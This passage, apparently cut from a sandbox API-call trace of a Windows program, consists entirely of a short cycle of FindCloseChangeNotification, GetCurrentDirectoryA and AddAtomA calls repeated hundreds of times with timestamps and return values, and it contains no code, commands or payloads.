0x0 [0078.418] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.418] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.418] AddAtomA (lpString=0x0) returned 0x0 [0078.418] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.418] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.418] AddAtomA (lpString=0x0) returned 0x0 [0078.418] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.418] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.418] AddAtomA (lpString=0x0) returned 0x0 [0078.419] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.419] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.419] AddAtomA (lpString=0x0) returned 0x0 [0078.419] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.419] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.419] AddAtomA (lpString=0x0) returned 0x0 [0078.419] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.419] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.419] AddAtomA (lpString=0x0) returned 0x0 [0078.419] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.419] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.419] AddAtomA (lpString=0x0) returned 0x0 [0078.419] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.419] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.419] AddAtomA (lpString=0x0) returned 0x0 [0078.419] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.420] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.420] AddAtomA (lpString=0x0) returned 0x0 [0078.420] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.420] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.420] AddAtomA (lpString=0x0) returned 0x0 [0078.420] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.420] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.420] AddAtomA (lpString=0x0) returned 0x0 [0078.420] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.420] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.420] AddAtomA (lpString=0x0) returned 0x0 [0078.420] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.420] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.420] AddAtomA (lpString=0x0) returned 0x0 [0078.421] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.421] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.421] AddAtomA (lpString=0x0) returned 0x0 [0078.421] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.421] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.421] AddAtomA (lpString=0x0) returned 0x0 [0078.421] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.421] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.421] AddAtomA (lpString=0x0) returned 0x0 [0078.421] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.421] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.421] AddAtomA (lpString=0x0) returned 0x0 [0078.421] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.421] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.421] AddAtomA (lpString=0x0) returned 0x0 [0078.421] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.421] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.422] AddAtomA (lpString=0x0) returned 0x0 [0078.422] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.422] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.422] AddAtomA (lpString=0x0) returned 0x0 [0078.422] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.422] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.422] AddAtomA (lpString=0x0) returned 0x0 [0078.422] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.422] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.422] AddAtomA (lpString=0x0) returned 0x0 [0078.422] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.422] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.422] AddAtomA (lpString=0x0) returned 0x0 [0078.422] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.422] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.422] AddAtomA (lpString=0x0) returned 0x0 [0078.422] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.423] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.423] AddAtomA (lpString=0x0) returned 0x0 [0078.423] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.423] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.423] AddAtomA (lpString=0x0) returned 0x0 [0078.423] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.423] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.423] AddAtomA (lpString=0x0) returned 0x0 [0078.423] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.423] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.423] AddAtomA (lpString=0x0) returned 0x0 [0078.423] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.423] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.423] AddAtomA (lpString=0x0) returned 0x0 [0078.423] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.423] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.423] AddAtomA (lpString=0x0) returned 0x0 [0078.423] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.424] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.424] AddAtomA (lpString=0x0) returned 0x0 [0078.424] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.424] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.424] AddAtomA (lpString=0x0) returned 0x0 [0078.424] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.424] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.424] AddAtomA (lpString=0x0) returned 0x0 [0078.424] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.424] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.424] AddAtomA (lpString=0x0) returned 0x0 [0078.424] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.424] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.424] AddAtomA (lpString=0x0) returned 0x0 [0078.424] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.424] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.425] AddAtomA (lpString=0x0) returned 0x0 [0078.425] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.425] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.425] AddAtomA (lpString=0x0) returned 0x0 [0078.425] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.425] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.425] AddAtomA (lpString=0x0) returned 0x0 [0078.425] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.425] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.425] AddAtomA (lpString=0x0) returned 0x0 [0078.425] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.425] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.505] AddAtomA (lpString=0x0) returned 0x0 [0078.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.505] AddAtomA (lpString=0x0) returned 0x0 [0078.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.505] AddAtomA (lpString=0x0) returned 0x0 [0078.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.505] AddAtomA (lpString=0x0) returned 0x0 [0078.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.505] AddAtomA (lpString=0x0) returned 0x0 [0078.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.505] AddAtomA (lpString=0x0) returned 0x0 [0078.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.506] AddAtomA (lpString=0x0) returned 0x0 [0078.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.507] AddAtomA (lpString=0x0) returned 0x0 [0078.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.507] AddAtomA (lpString=0x0) returned 0x0 [0078.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.507] AddAtomA (lpString=0x0) returned 0x0 [0078.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.507] AddAtomA (lpString=0x0) returned 0x0 [0078.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.507] AddAtomA (lpString=0x0) returned 0x0 [0078.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.507] AddAtomA (lpString=0x0) returned 0x0 [0078.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.507] AddAtomA (lpString=0x0) returned 0x0 [0078.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.508] AddAtomA (lpString=0x0) returned 0x0 [0078.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.508] AddAtomA (lpString=0x0) returned 0x0 [0078.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.508] AddAtomA (lpString=0x0) returned 0x0 [0078.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.508] AddAtomA (lpString=0x0) returned 0x0 [0078.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.508] AddAtomA (lpString=0x0) returned 0x0 [0078.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.508] AddAtomA (lpString=0x0) returned 0x0 [0078.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.508] AddAtomA (lpString=0x0) returned 0x0 [0078.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.508] AddAtomA (lpString=0x0) returned 0x0 [0078.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.509] AddAtomA (lpString=0x0) returned 0x0 [0078.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.510] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.511] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.511] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.511] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.511] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.511] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.511] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.511] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.511] AddAtomA (lpString=0x0) returned 0x0 [0078.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.512] AddAtomA (lpString=0x0) returned 0x0 [0078.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA (lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA (lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA (lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA (lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA (lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA (lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA 